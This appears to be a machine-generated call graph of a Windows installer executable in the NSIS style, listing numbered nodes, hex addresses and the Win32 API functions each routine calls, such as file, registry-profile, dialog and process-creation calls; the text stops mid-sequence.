GlobalAlloc WideCharToMultiByte 5579->5580 5580->5574 5580->5575 5580->5577 5580->5579 5581 6e9e297b GlobalAlloc lstrcpynW 5580->5581 5582 6e9e2957 lstrlenW 5580->5582 5651 6e9e1628 5580->5651 5581->5580 5583 6e9e29b0 GlobalAlloc CLSIDFromString GlobalFree 5581->5583 5582->5577 5585 6e9e2966 5582->5585 5583->5577 5585->5577 5656 6e9e2554 5585->5656 5589 6e9e125e 5586->5589 5587 6e9e1303 LoadImageW 5588 6e9e1321 5587->5588 5590 6e9e141d 5588->5590 5591 6e9e1412 GetLastError 5588->5591 5589->5587 5590->5515 5591->5590 5593 6e9e2407 5592->5593 5594 6e9e23d1 5592->5594 5593->5495 5594->5593 5595 6e9e23e3 GlobalAlloc 5594->5595 5595->5594 5597 6e9e25cd 5596->5597 5598 6e9e261f 5597->5598 5599 6e9e260c GlobalAlloc 5597->5599 5600 6e9e2625 GlobalSize 5598->5600 5601 6e9e262f 5598->5601 5599->5601 5600->5601 5601->5519 5603 6e9e1512 5602->5603 5604 6e9e1552 GlobalFree 5603->5604 5609 6e9e245e 5605->5609 5607 6e9e24f3 lstrcpyW 5607->5609 5608 6e9e24bf MultiByteToWideChar 5608->5609 5609->5607 5609->5608 5610 6e9e2515 GlobalFree 5609->5610 5611 6e9e253e GlobalFree 5609->5611 5613 6e9e24a1 lstrcpynW 5609->5613 5614 6e9e2490 StringFromGUID2 5609->5614 5615 6e9e15e0 2 API calls 5609->5615 5659 6e9e1581 GlobalAlloc 5609->5659 5660 6e9e164f 5609->5660 5610->5609 5611->5609 5612 6e9e254f 5611->5612 5617 6e9e1904 5612->5617 5613->5609 5614->5609 5615->5609 5664 6e9e1581 GlobalAlloc 5617->5664 5619 6e9e190a 5620 6e9e1928 lstrcpyW 5619->5620 5621 6e9e1931 5619->5621 5620->5621 5622 6e9e15e0 5621->5622 5623 6e9e15e9 GlobalAlloc lstrcpynW 5622->5623 5624 6e9e1623 GlobalFree 5622->5624 5623->5624 5624->5523 5626 6e9e241a 5625->5626 5627 6e9e2442 5625->5627 5626->5627 5628 6e9e2432 GlobalFree 5626->5628 5627->5528 5627->5529 5628->5626 5630 6e9e189e 5629->5630 5631 6e9e15e0 2 API calls 5630->5631 5632 6e9e18aa 5631->5632 5632->5531 5633->5534 5634->5536 5636 6e9e15ac 5635->5636 5637 6e9e15dd 5635->5637 5636->5637 5649 6e9e1581 GlobalAlloc 5636->5649 5637->5565 5639 6e9e15ba lstrcpyW GlobalFree 5639->5565 5641 6e9e18fd 5640->5641 5641->5561 5650 6e9e1581 GlobalAlloc 5642->5650 5644 6e9e159b lstrcpyW 5644->5556 5645->5565 5646->5570 5647->5553 5648->5567 5649->5639 5650->5644 5652 6e9e162f 5651->5652 5653 6e9e164a 5651->5653 5654 6e9e1592 2 API calls 5652->5654 5653->5653 5655 6e9e1648 5654->5655 5655->5580 5657 6e9e25aa 5656->5657 5658 6e9e2562 VirtualAlloc 5656->5658 5657->5585 5658->5657 5659->5609 5661 6e9e167a 5660->5661 5662 6e9e1658 5660->5662 5661->5609 5662->5661 5663 6e9e165e lstrcpyW 5662->5663 5663->5661 5664->5619 6641 402392 6642 40145c 18 API calls 6641->6642 6643 402399 6642->6643 6646 407224 6643->6646 6647 406efe 25 API calls 6646->6647 6648 407244 6647->6648 6649 4023a7 6648->6649 6650 40724e lstrcpynW lstrcmpW 6648->6650 6651 407280 6650->6651 6652 407286 lstrcpynW 6650->6652 6651->6652 6652->6649 5985 402713 6000 406035 lstrcpynW 5985->6000 5987 40272c 6001 406035 lstrcpynW 5987->6001 5989 402738 5990 402743 5989->5990 5991 40145c 18 API calls 5989->5991 5992 402752 5990->5992 5993 40145c 18 API calls 5990->5993 5991->5990 5995 40145c 18 API calls 5992->5995 5997 402761 5992->5997 5993->5992 5994 40145c 18 API calls 5996 40276b 5994->5996 5995->5997 5998 4062cf 11 API calls 5996->5998 5997->5994 5999 40277f WritePrivateProfileStringW 5998->5999 6000->5987 6001->5989 6653 6ffb142d 6654 6ffb143b 6653->6654 6655 6ffb145a CallWindowProcW 6653->6655 6654->6655 6656 6ffb1456 6654->6656 6655->6656 6657 6ffb147a 6655->6657 6657->6656 6658 6ffb147e DestroyWindow GetProcessHeap HeapFree 6657->6658 6658->6656 6659 402797 6660 40145c 18 API calls 6659->6660 6661 4027ae 6660->6661 6662 40145c 18 API calls 6661->6662 6663 4027b7 6662->6663 6664 40145c 18 API calls 6663->6664 6665 4027c0 GetPrivateProfileStringW lstrcmpW 6664->6665 6666 401e9a 6667 40145c 18 API calls 6666->6667 6668 401ea1 6667->6668 6669 401446 18 API calls 6668->6669 6670 401eab wsprintfW 6669->6670 6671 6ffb1021 6672 6ffb1e34 2 API calls 6671->6672 6673 6ffb1053 6672->6673 6674 6ffb1057 6673->6674 6676 6ffb1e34 2 API calls 6673->6676 6675 6ffb1e83 2 API calls 6674->6675 6678 6ffb1061 6675->6678 6677 6ffb1074 6676->6677 6677->6674 6679 6ffb1078 SHBrowseForFolderW 6677->6679 6680 6ffb10cc SHGetPathFromIDListW 6679->6680 6681 6ffb10c0 6679->6681 6683 6ffb10de 6680->6683 6682 6ffb1e83 2 API calls 6681->6682 6684 6ffb10ca 6682->6684 6685 6ffb1e83 2 API calls 6683->6685 6686 6ffb10f1 CoTaskMemFree 6685->6686 6686->6684 5716 401a1f 5717 40145c 18 API calls 5716->5717 5718 401a26 5717->5718 5719 4062cf 11 API calls 5718->5719 5720 401a49 5719->5720 5721 401a64 5720->5721 5722 401a5c 5720->5722 5770 406035 lstrcpynW 5721->5770 5769 406035 lstrcpynW 5722->5769 5725 401a62 5728 406064 5 API calls 5725->5728 5726 401a6f 5727 40674e 3 API calls 5726->5727 5729 401a75 lstrcatW 5727->5729 5762 401a81 5728->5762 5729->5725 5730 406301 2 API calls 5730->5762 5731 405e5c 2 API calls 5731->5762 5733 401a98 CompareFileTime 5733->5762 5734 401ba9 5735 404f9e 25 API calls 5734->5735 5737 401bb3 5735->5737 5736 401b5d 5739 404f9e 25 API calls 5736->5739 5740 40337f 33 API calls 5737->5740 5738 4062cf 11 API calls 5738->5762 5741 401b70 5739->5741 5742 401bc6 5740->5742 5745 4062cf 11 API calls 5741->5745 5744 4062cf 11 API calls 5742->5744 5743 406035 lstrcpynW 5743->5762 5746 401bda 5744->5746 5750 401b8b 5745->5750 5747 401be9 SetFileTime 5746->5747 5748 401bf8 CloseHandle 5746->5748 5747->5748 5748->5750 5751 401c09 5748->5751 5749 406831 18 API calls 5749->5762 5752 401c21 5751->5752 5753 401c0e 5751->5753 5755 406831 18 API calls 5752->5755 5754 406831 18 API calls 5753->5754 5757 401c16 lstrcatW 5754->5757 5758 401c29 5755->5758 5756 405ccc MessageBoxIndirectW 5756->5762 5757->5758 5759 4062cf 11 API calls 5758->5759 5760 401c34 5759->5760 5765 405ccc MessageBoxIndirectW 5760->5765 5761 401b50 5763 401b93 5761->5763 5764 401b53 5761->5764 5762->5730 5762->5731 5762->5733 5762->5734 5762->5736 5762->5738 5762->5743 5762->5749 5762->5756 5762->5761 5768 405e7c GetFileAttributesW CreateFileW 5762->5768 5767 4062cf 11 API calls 5763->5767 5766 4062cf 11 API calls 5764->5766 5765->5750 5766->5736 5767->5750 5768->5762 5769->5725 5770->5726 6687 6ffb1d24 6688 6ffb2025 2 API calls 6687->6688 6689 6ffb1d29 6688->6689 6690 40209f GetDlgItem GetClientRect 6691 40145c 18 API calls 6690->6691 6692 4020cf LoadImageW SendMessageW 6691->6692 6693 4030e3 6692->6693 6694 4020ed DeleteObject 6692->6694 6694->6693 6695 402b9f 6696 401446 18 API calls 6695->6696 6701 402ba7 6696->6701 6697 402c4a 6698 401446 18 API calls 6700 402c3d 6698->6700 6699 402bdf ReadFile 6699->6700 6699->6701 6700->6697 6700->6698 6707 402d17 ReadFile 6700->6707 6701->6697 6701->6699 6701->6700 6702 402c06 MultiByteToWideChar 6701->6702 6703 402c3f 6701->6703 6704 402c4f 6701->6704 6702->6701 6702->6704 6708 405f7d wsprintfW 6703->6708 6704->6700 6706 402c6b SetFilePointer 6704->6706 6706->6700 6707->6700 6708->6697 6002 402b23 GlobalAlloc 6003 402b39 6002->6003 6004 402b4b 6002->6004 6005 401446 18 API calls 6003->6005 6006 40145c 18 API calls 6004->6006 6008 402b41 6005->6008 6007 402b52 WideCharToMultiByte lstrlenA 6006->6007 6007->6008 6009 402b93 6008->6009 6010 402b84 WriteFile 6008->6010 6010->6009 6011 402384 GlobalFree 6010->6011 6011->6009 6709 4040a3 6710 4040b0 lstrcpynW lstrlenW 6709->6710 6711 4040ad 6709->6711 6711->6710 4728 4054a5 4729 4055f9 4728->4729 4730 4054bd 4728->4730 4732 40564a 4729->4732 4733 40560a GetDlgItem GetDlgItem 4729->4733 4730->4729 4731 4054c9 4730->4731 4734 4054d4 SetWindowPos 4731->4734 4735 4054e7 4731->4735 4737 4056a4 4732->4737 4745 40139d 80 API calls 4732->4745 4736 403d6b 19 API calls 4733->4736 4734->4735 4739 405504 4735->4739 4740 4054ec ShowWindow 4735->4740 4741 405634 SetClassLongW 4736->4741 4761 4055f4 4737->4761 4799 403ddb 4737->4799 4742 405526 4739->4742 4743 40550c DestroyWindow 4739->4743 4740->4739 4744 40141d 80 API calls 4741->4744 4747 40552b SetWindowLongW 4742->4747 4748 40553c 4742->4748 4746 405929 4743->4746 4744->4732 4749 40567c 4745->4749 4756 405939 ShowWindow 4746->4756 4746->4761 4747->4761 4753 4055e5 4748->4753 4754 405548 GetDlgItem 4748->4754 4749->4737 4750 405680 SendMessageW 4749->4750 4750->4761 4751 40141d 80 API calls 4757 4056b6 4751->4757 4752 40590a DestroyWindow EndDialog 4752->4746 4819 403df6 4753->4819 4758 405578 4754->4758 4759 40555b SendMessageW IsWindowEnabled 4754->4759 4756->4761 4757->4751 4757->4752 4757->4761 4762 406831 18 API calls 4757->4762 4767 403d6b 19 API calls 4757->4767 4789 40584a DestroyWindow 4757->4789 4802 403d6b 4757->4802 4760 40557d 4758->4760 4763 405585 4758->4763 4764 4055cc SendMessageW 4758->4764 4765 405598 4758->4765 4759->4758 4759->4761 4816 403d44 4760->4816 4762->4757 4763->4760 4763->4764 4764->4753 4768 4055a0 4765->4768 4769 4055b5 4765->4769 4767->4757 4813 40141d 4768->4813 4772 40141d 80 API calls 4769->4772 4770 4055b3 4770->4753 4773 4055bc 4772->4773 4773->4753 4773->4760 4775 405731 GetDlgItem 4776 405746 4775->4776 4777 40574f ShowWindow KiUserCallbackDispatcher 4775->4777 4776->4777 4805 403db1 EnableWindow 4777->4805 4779 405779 EnableWindow 4782 40578d 4779->4782 4780 405792 GetSystemMenu EnableMenuItem SendMessageW 4781 4057c2 SendMessageW 4780->4781 4780->4782 4781->4782 4782->4780 4806 403dc4 SendMessageW 4782->4806 4807 406035 lstrcpynW 4782->4807 4785 4057f0 lstrlenW 4786 406831 18 API calls 4785->4786 4787 405806 SetWindowTextW 4786->4787 4808 40139d 4787->4808 4789->4746 4790 405864 CreateDialogParamW 4789->4790 4790->4746 4791 405897 4790->4791 4792 403d6b 19 API calls 4791->4792 4793 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4792->4793 4794 40139d 80 API calls 4793->4794 4795 4058e8 4794->4795 4795->4761 4796 4058f0 ShowWindow 4795->4796 4797 403ddb SendMessageW 4796->4797 4798 405908 4797->4798 4798->4746 4800 403df3 4799->4800 4801 403de4 SendMessageW 4799->4801 4800->4757 4801->4800 4803 406831 18 API calls 4802->4803 4804 403d76 SetDlgItemTextW 4803->4804 4804->4775 4805->4779 4806->4782 4807->4785 4811 4013a4 4808->4811 4809 401410 4809->4757 4811->4809 4812 4013dd MulDiv SendMessageW 4811->4812 4833 4015a0 4811->4833 4812->4811 4814 40139d 80 API calls 4813->4814 4815 401432 4814->4815 4815->4760 4817 403d51 SendMessageW 4816->4817 4818 403d4b 4816->4818 4817->4770 4818->4817 4820 403e0b GetWindowLongW 4819->4820 4830 403e94 4819->4830 4821 403e1c 4820->4821 4820->4830 4822 403e2b GetSysColor 4821->4822 4823 403e2e 4821->4823 4822->4823 4824 403e34 SetTextColor 4823->4824 4825 403e3e SetBkMode 4823->4825 4824->4825 4826 403e56 GetSysColor 4825->4826 4827 403e5c 4825->4827 4826->4827 4828 403e63 SetBkColor 4827->4828 4829 403e6d 4827->4829 4828->4829 4829->4830 4831 403e80 DeleteObject 4829->4831 4832 403e87 CreateBrushIndirect 4829->4832 4830->4761 4831->4832 4832->4830 4834 4015fa 4833->4834 4914 40160c 4833->4914 4835 401601 4834->4835 4836 401742 4834->4836 4837 401962 4834->4837 4838 4019ca 4834->4838 4839 40176e 4834->4839 4840 401650 4834->4840 4841 4017b1 4834->4841 4842 401672 4834->4842 4843 401693 4834->4843 4844 401616 4834->4844 4845 4016d6 4834->4845 4846 401736 4834->4846 4847 401897 4834->4847 4848 4018db 4834->4848 4849 40163c 4834->4849 4850 4016bd 4834->4850 4834->4914 4857 4062cf 11 API calls 4835->4857 4863 401751 ShowWindow 4836->4863 4864 401758 4836->4864 4854 40145c 18 API calls 4837->4854 4861 40145c 18 API calls 4838->4861 4851 40145c 18 API calls 4839->4851 4878 4062cf 11 API calls 4840->4878 4855 40145c 18 API calls 4841->4855 4852 40145c 18 API calls 4842->4852 4856 401446 18 API calls 4843->4856 4860 40145c 18 API calls 4844->4860 4876 401446 18 API calls 4845->4876 4845->4914 4846->4914 4971 405f7d wsprintfW 4846->4971 4853 40145c 18 API calls 4847->4853 4858 40145c 18 API calls 4848->4858 4862 401647 PostQuitMessage 4849->4862 4849->4914 4859 4062cf 11 API calls 4850->4859 4866 401775 4851->4866 4867 401678 4852->4867 4868 40189d 4853->4868 4869 401968 GetFullPathNameW 4854->4869 4870 4017b8 4855->4870 4871 40169a 4856->4871 4857->4914 4872 4018e2 4858->4872 4873 4016c7 SetForegroundWindow 4859->4873 4874 40161c 4860->4874 4875 4019d1 SearchPathW 4861->4875 4862->4914 4863->4864 4865 401765 ShowWindow 4864->4865 4864->4914 4865->4914 4879 4062cf 11 API calls 4866->4879 4880 4062cf 11 API calls 4867->4880 4962 406301 FindFirstFileW 4868->4962 4882 4019a1 4869->4882 4883 40197f 4869->4883 4941 4062cf lstrlenW wvsprintfW 4870->4941 4885 4062cf 11 API calls 4871->4885 4886 40145c 18 API calls 4872->4886 4873->4914 4887 4062cf 11 API calls 4874->4887 4875->4846 4875->4914 4876->4914 4888 401664 4878->4888 4889 401785 SetFileAttributesW 4879->4889 4890 401683 4880->4890 4903 4019b8 GetShortPathNameW 4882->4903 4882->4914 4883->4882 4909 406301 2 API calls 4883->4909 4893 4016a7 4885->4893 4894 4018eb 4886->4894 4895 401627 4887->4895 4896 40139d 65 API calls 4888->4896 4897 40179a 4889->4897 4889->4914 4907 404f9e 25 API calls 4890->4907 4901 4016b1 Sleep 4893->4901 4902 4016ae 4893->4902 4904 40145c 18 API calls 4894->4904 4950 404f9e 4895->4950 4896->4914 4906 4062cf 11 API calls 4897->4906 4898 4018c2 4910 4062cf 11 API calls 4898->4910 4899 4018a9 4908 4062cf 11 API calls 4899->4908 4901->4914 4902->4901 4903->4914 4912 4018f5 4904->4912 4906->4914 4907->4914 4908->4914 4913 401991 4909->4913 4910->4914 4911 4017d4 4915 401864 4911->4915 4918 405d32 CharNextW 4911->4918 4931 4062cf 11 API calls 4911->4931 4916 4062cf 11 API calls 4912->4916 4913->4882 4970 406035 lstrcpynW 4913->4970 4914->4811 4915->4890 4917 40186e 4915->4917 4919 401902 MoveFileW 4916->4919 4920 404f9e 25 API calls 4917->4920 4922 4017e6 CreateDirectoryW 4918->4922 4923 401912 4919->4923 4924 40191e 4919->4924 4925 401875 4920->4925 4922->4911 4926 4017fe GetLastError 4922->4926 4923->4890 4928 401942 4924->4928 4932 406301 2 API calls 4924->4932 4961 406035 lstrcpynW 4925->4961 4929 401827 GetFileAttributesW 4926->4929 4930 40180b GetLastError 4926->4930 4934 4062cf 11 API calls 4928->4934 4929->4911 4935 4062cf 11 API calls 4930->4935 4931->4911 4936 401929 4932->4936 4933 401882 SetCurrentDirectoryW 4933->4914 4937 40195c 4934->4937 4935->4911 4936->4928 4965 406c94 4936->4965 4937->4914 4940 404f9e 25 API calls 4940->4928 4972 406113 4941->4972 4944 405d85 CharNextW CharNextW 4945 405da2 4944->4945 4949 405db4 4944->4949 4947 405daf CharNextW 4945->4947 4945->4949 4946 405dd8 4946->4911 4947->4946 4948 405d32 CharNextW 4948->4949 4949->4946 4949->4948 4952 404fb7 4950->4952 4957 40505b 4950->4957 4951 404fd5 lstrlenW 4954 404fe3 lstrlenW 4951->4954 4955 404ffe 4951->4955 4952->4951 4953 406831 18 API calls 4952->4953 4953->4951 4956 404ff5 lstrcatW 4954->4956 4954->4957 4958 405011 4955->4958 4959 405004 SetWindowTextW 4955->4959 4956->4955 4957->4914 4958->4957 4960 405017 SendMessageW SendMessageW SendMessageW 4958->4960 4959->4958 4960->4957 4961->4933 4963 4018a5 4962->4963 4964 406317 FindClose 4962->4964 4963->4898 4963->4899 4964->4963 4986 406328 GetModuleHandleA 4965->4986 4969 401936 4969->4940 4970->4882 4971->4914 4973 40611f 4972->4973 4976 40613c 4972->4976 4974 4017c9 4973->4974 4975 406129 CloseHandle 4973->4975 4974->4944 4975->4974 4976->4974 4977 4061b3 4976->4977 4978 406159 4976->4978 4977->4974 4980 4061bc lstrcatW lstrlenW WriteFile 4977->4980 4979 406162 GetFileAttributesW 4978->4979 4978->4980 4985 405e7c GetFileAttributesW CreateFileW 4979->4985 4980->4974 4982 40617e 4982->4974 4983 4061a8 SetFilePointer 4982->4983 4984 40618e WriteFile 4982->4984 4983->4977 4984->4983 4985->4982 4987 406340 LoadLibraryA 4986->4987 4988 40634b GetProcAddress 4986->4988 4987->4988 4989 406359 4987->4989 4988->4989 4989->4969 4990 406ac5 lstrcpyW 4989->4990 4991 406b13 GetShortPathNameW 4990->4991 4992 406aea 4990->4992 4994 406b2c 4991->4994 4995 406c8e 4991->4995 5016 405e7c GetFileAttributesW CreateFileW 4992->5016 4994->4995 4996 406b34 WideCharToMultiByte 4994->4996 4995->4969 4996->4995 4998 406b51 WideCharToMultiByte 4996->4998 4997 406af3 CloseHandle GetShortPathNameW 4997->4995 4999 406b0b 4997->4999 4998->4995 5000 406b69 wsprintfA 4998->5000 4999->4991 4999->4995 5001 406831 18 API calls 5000->5001 5002 406b95 5001->5002 5017 405e7c GetFileAttributesW CreateFileW 5002->5017 5004 406ba2 5004->4995 5005 406baf GetFileSize GlobalAlloc 5004->5005 5006 406bd0 ReadFile 5005->5006 5007 406c84 CloseHandle 5005->5007 5006->5007 5008 406bea 5006->5008 5007->4995 5008->5007 5018 405de2 lstrlenA 5008->5018 5011 406c03 lstrcpyA 5014 406c25 5011->5014 5012 406c17 5013 405de2 4 API calls 5012->5013 5013->5014 5015 406c5c SetFilePointer WriteFile GlobalFree 5014->5015 5015->5007 5016->4997 5017->5004 5019 405e23 lstrlenA 5018->5019 5020 405e2b 5019->5020 5021 405dfc lstrcmpiA 5019->5021 5020->5011 5020->5012 5021->5020 5022 405e1a CharNextA 5021->5022 5022->5019 6712 402da5 6713 4030e3 6712->6713 6714 402dac 6712->6714 6715 401446 18 API calls 6714->6715 6716 402db8 6715->6716 6717 402dbf SetFilePointer 6716->6717 6717->6713 6718 402dcf 6717->6718 6718->6713 6720 405f7d wsprintfW 6718->6720 6720->6713 6721 4049a8 GetDlgItem GetDlgItem 6722 4049fe 7 API calls 6721->6722 6727 404c16 6721->6727 6723 404aa2 DeleteObject 6722->6723 6724 404a96 SendMessageW 6722->6724 6725 404aad 6723->6725 6724->6723 6728 404ae4 6725->6728 6730 406831 18 API calls 6725->6730 6726 404cfb 6729 404da0 6726->6729 6734 404c09 6726->6734 6740 404d4a SendMessageW 6726->6740 6727->6726 6738 40487a 5 API calls 6727->6738 6753 404c86 6727->6753 6733 403d6b 19 API calls 6728->6733 6731 404db5 6729->6731 6732 404da9 SendMessageW 6729->6732 6736 404ac6 SendMessageW SendMessageW 6730->6736 6742 404dc7 ImageList_Destroy 6731->6742 6743 404dce 6731->6743 6750 404dde 6731->6750 6732->6731 6739 404af8 6733->6739 6735 403df6 8 API calls 6734->6735 6741 404f97 6735->6741 6736->6725 6737 404ced SendMessageW 6737->6726 6738->6753 6744 403d6b 19 API calls 6739->6744 6740->6734 6746 404d5f SendMessageW 6740->6746 6742->6743 6747 404dd7 GlobalFree 6743->6747 6743->6750 6757 404b09 6744->6757 6745 404f48 6745->6734 6751 404f5d ShowWindow GetDlgItem ShowWindow 6745->6751 6748 404d72 6746->6748 6747->6750 6754 404d83 SendMessageW 6748->6754 6749 404bd6 GetWindowLongW SetWindowLongW 6752 404bf0 6749->6752 6750->6745 6758 40141d 80 API calls 6750->6758 6768 404e10 6750->6768 6751->6734 6755 404bf6 ShowWindow 6752->6755 6756 404c0e 6752->6756 6753->6726 6753->6737 6754->6729 6772 403dc4 SendMessageW 6755->6772 6773 403dc4 SendMessageW 6756->6773 6757->6749 6759 404bd0 6757->6759 6762 404b65 SendMessageW 6757->6762 6763 404b93 SendMessageW 6757->6763 6764 404ba7 SendMessageW 6757->6764 6758->6768 6759->6749 6759->6752 6762->6757 6763->6757 6764->6757 6765 404e54 6766 404f1f InvalidateRect 6765->6766 6771 404ecd SendMessageW SendMessageW 6765->6771 6766->6745 6767 404f35 6766->6767 6770 4043d9 21 API calls 6767->6770 6768->6765 6769 404e3e SendMessageW 6768->6769 6769->6765 6770->6745 6771->6765 6772->6734 6773->6727 5030 4030a9 SendMessageW 5031 4030c2 InvalidateRect 5030->5031 5032 4030e3 5030->5032 5031->5032 5033 6ffb1791 5034 6ffb17c2 5033->5034 5042 6ffb2025 5034->5042 5036 6ffb17d6 GetDlgItem GetWindowRect MapWindowPoints CreateDialogParamW 5037 6ffb1823 SetWindowPos SetWindowLongW GetProcessHeap HeapAlloc 5036->5037 5038 6ffb1817 5036->5038 5048 6ffb2085 wsprintfW 5037->5048 5045 6ffb1e83 5038->5045 5041 6ffb1821 5051 6ffb1e34 5042->5051 5044 6ffb203f 5044->5036 5046 6ffb1e8c GlobalAlloc lstrcpynW 5045->5046 5047 6ffb1ec6 5045->5047 5046->5047 5047->5041 5049 6ffb1e83 2 API calls 5048->5049 5050 6ffb20b2 5049->5050 5050->5041 5052 6ffb1e7d 5051->5052 5053 6ffb1e3d 5051->5053 5052->5044 5053->5052 5054 6ffb1e6d GlobalFree 5053->5054 5055 6ffb1e59 lstrcpynW 5053->5055 5054->5052 5055->5054 6013 6ffb1b95 6014 6ffb2025 2 API calls 6013->6014 6015 6ffb1b9b IsWindow 6014->6015 6016 6ffb1ba8 6015->6016 6017 6ffb1baf 6015->6017 6019 6ffb1e83 2 API calls 6016->6019 6018 6ffb13f8 GetPropW 6017->6018 6018->6016 6020 6ffb1bc2 6019->6020 5056 4038af #17 SetErrorMode OleInitialize 5057 406328 3 API calls 5056->5057 5058 4038f2 SHGetFileInfoW 5057->5058 5129 406035 lstrcpynW 5058->5129 5060 40391d GetCommandLineW 5130 406035 lstrcpynW 5060->5130 5062 40392f GetModuleHandleW 5063 403947 5062->5063 5064 405d32 CharNextW 5063->5064 5065 403956 CharNextW 5064->5065 5074 403968 5065->5074 5066 403a02 5067 403a21 GetTempPathW 5066->5067 5131 4037f8 5067->5131 5069 403a37 5071 403a3b GetWindowsDirectoryW lstrcatW 5069->5071 5072 403a5f DeleteFileW 5069->5072 5070 405d32 CharNextW 5070->5074 5075 4037f8 11 API calls 5071->5075 5139 4035b3 GetTickCount GetModuleFileNameW 5072->5139 5074->5066 5074->5070 5087 403a04 5074->5087 5077 403a57 5075->5077 5076 403a73 5078 403af8 5076->5078 5079 403add 5076->5079 5081 405d32 CharNextW 5076->5081 5077->5072 5077->5078 5241 403885 5078->5241 5167 405958 5079->5167 5093 403a8a 5081->5093 5084 403aed 5088 406113 9 API calls 5084->5088 5085 403bfa 5089 403c7d 5085->5089 5091 406328 3 API calls 5085->5091 5086 403b0d 5248 405ccc 5086->5248 5224 406035 lstrcpynW 5087->5224 5088->5078 5095 403c09 5091->5095 5096 403b23 lstrcatW lstrcmpiW 5093->5096 5097 403ab5 5093->5097 5098 406328 3 API calls 5095->5098 5096->5078 5100 403b3f CreateDirectoryW SetCurrentDirectoryW 5096->5100 5225 4067aa 5097->5225 5103 403c12 5098->5103 5101 403b62 5100->5101 5102 403b57 5100->5102 5253 406035 lstrcpynW 5101->5253 5252 406035 lstrcpynW 5102->5252 5107 406328 3 API calls 5103->5107 5110 403c1b 5107->5110 5109 403b70 5254 406035 lstrcpynW 5109->5254 5113 403c69 ExitWindowsEx 5110->5113 5116 403c29 GetCurrentProcess 5110->5116 5111 403ad2 5240 406035 lstrcpynW 5111->5240 5113->5089 5115 403c76 5113->5115 5117 40141d 80 API calls 5115->5117 5119 403c39 5116->5119 5117->5089 5118 406831 18 API calls 5120 403b98 DeleteFileW 5118->5120 5119->5113 5121 403ba5 CopyFileW 5120->5121 5126 403b7f 5120->5126 5121->5126 5122 403bee 5123 406c94 42 API calls 5122->5123 5123->5078 5124 406c94 42 API calls 5124->5126 5125 406831 18 API calls 5125->5126 5126->5118 5126->5122 5126->5124 5126->5125 5128 403bd9 CloseHandle 5126->5128 5255 405c6b CreateProcessW 5126->5255 5128->5126 5129->5060 5130->5062 5132 406064 5 API calls 5131->5132 5133 403804 5132->5133 5134 40380e 5133->5134 5258 40674e lstrlenW CharPrevW 5133->5258 5134->5069 5265 405e7c GetFileAttributesW CreateFileW 5139->5265 5141 4035f3 5161 403603 5141->5161 5266 406035 lstrcpynW 5141->5266 5143 403619 5267 40677d lstrlenW 5143->5267 5147 40362a GetFileSize 5148 403726 5147->5148 5166 403641 5147->5166 5274 4032d2 5148->5274 5150 40372f 5152 40376b GlobalAlloc 5150->5152 5150->5161 5285 403368 SetFilePointer 5150->5285 5286 403368 SetFilePointer 5152->5286 5155 4037e9 5158 4032d2 6 API calls 5155->5158 5156 403786 5287 40337f 5156->5287 5157 40374c 5160 403336 ReadFile 5157->5160 5158->5161 5162 403757 5160->5162 5161->5076 5162->5152 5162->5161 5163 4032d2 6 API calls 5163->5166 5164 403792 5164->5161 5164->5164 5165 4037c0 SetFilePointer 5164->5165 5165->5161 5166->5148 5166->5155 5166->5161 5166->5163 5272 403336 ReadFile 5166->5272 5168 406328 3 API calls 5167->5168 5169 40596c 5168->5169 5170 405972 5169->5170 5171 405984 5169->5171 5322 405f7d wsprintfW 5170->5322 5172 405eff 3 API calls 5171->5172 5173 4059b5 5172->5173 5175 4059d4 lstrcatW 5173->5175 5177 405eff 3 API calls 5173->5177 5176 405982 5175->5176 5313 403ec1 5176->5313 5177->5175 5180 4067aa 18 API calls 5181 405a06 5180->5181 5182 405a9c 5181->5182 5184 405eff 3 API calls 5181->5184 5183 4067aa 18 API calls 5182->5183 5185 405aa2 5183->5185 5186 405a38 5184->5186 5187 405ab2 5185->5187 5188 406831 18 API calls 5185->5188 5186->5182 5192 405a5b lstrlenW 5186->5192 5195 405d32 CharNextW 5186->5195 5189 405ad2 LoadImageW 5187->5189 5324 403ea0 5187->5324 5188->5187 5190 405b92 5189->5190 5191 405afd RegisterClassW 5189->5191 5194 40141d 80 API calls 5190->5194 5193 405b45 SystemParametersInfoW CreateWindowExW 5191->5193 5223 405b9c 5191->5223 5196 405a69 lstrcmpiW 5192->5196 5197 405a8f 5192->5197 5193->5190 5200 405b98 5194->5200 5201 405a56 5195->5201 5196->5197 5202 405a79 GetFileAttributesW 5196->5202 5199 40674e 3 API calls 5197->5199 5204 405a95 5199->5204 5208 403ec1 19 API calls 5200->5208 5200->5223 5201->5192 5205 405a85 5202->5205 5203 405ac8 5203->5189 5323 406035 lstrcpynW 5204->5323 5205->5197 5206 40677d 2 API calls 5205->5206 5206->5197 5209 405ba9 5208->5209 5210 405bb5 ShowWindow LoadLibraryW 5209->5210 5211 405c38 5209->5211 5213 405bd4 LoadLibraryW 5210->5213 5214 405bdb GetClassInfoW 5210->5214 5329 405073 OleInitialize 5211->5329 5213->5214 5216 405c05 DialogBoxParamW 5214->5216 5217 405bef GetClassInfoW RegisterClassW 5214->5217 5215 405c3e 5218 405c42 5215->5218 5219 405c5a 5215->5219 5220 40141d 80 API calls 5216->5220 5217->5216 5222 40141d 80 API calls 5218->5222 5218->5223 5221 40141d 80 API calls 5219->5221 5220->5223 5221->5223 5222->5223 5223->5084 5224->5067 5339 406035 lstrcpynW 5225->5339 5227 4067bb 5228 405d85 4 API calls 5227->5228 5229 4067c1 5228->5229 5230 406064 5 API calls 5229->5230 5237 403ac3 5229->5237 5236 4067d1 5230->5236 5231 406809 lstrlenW 5232 406810 5231->5232 5231->5236 5233 40674e 3 API calls 5232->5233 5235 406816 GetFileAttributesW 5233->5235 5234 406301 2 API calls 5234->5236 5235->5237 5236->5231 5236->5234 5236->5237 5238 40677d 2 API calls 5236->5238 5237->5078 5239 406035 lstrcpynW 5237->5239 5238->5231 5239->5111 5240->5079 5242 40389d 5241->5242 5243 40388f CloseHandle 5241->5243 5340 403caf 5242->5340 5243->5242 5249 405ce1 5248->5249 5250 403b1b ExitProcess 5249->5250 5251 405cf7 MessageBoxIndirectW 5249->5251 5251->5250 5252->5101 5253->5109 5254->5126 5256 405ca6 5255->5256 5257 405c9a CloseHandle 5255->5257 5256->5126 5257->5256 5259 403816 CreateDirectoryW 5258->5259 5260 40676b lstrcatW 5258->5260 5261 405eab 5259->5261 5260->5259 5262 405eb8 GetTickCount GetTempFileNameW 5261->5262 5263 405eee 5262->5263 5264 40382a 5262->5264 5263->5262 5263->5264 5264->5069 5265->5141 5266->5143 5268 40678c 5267->5268 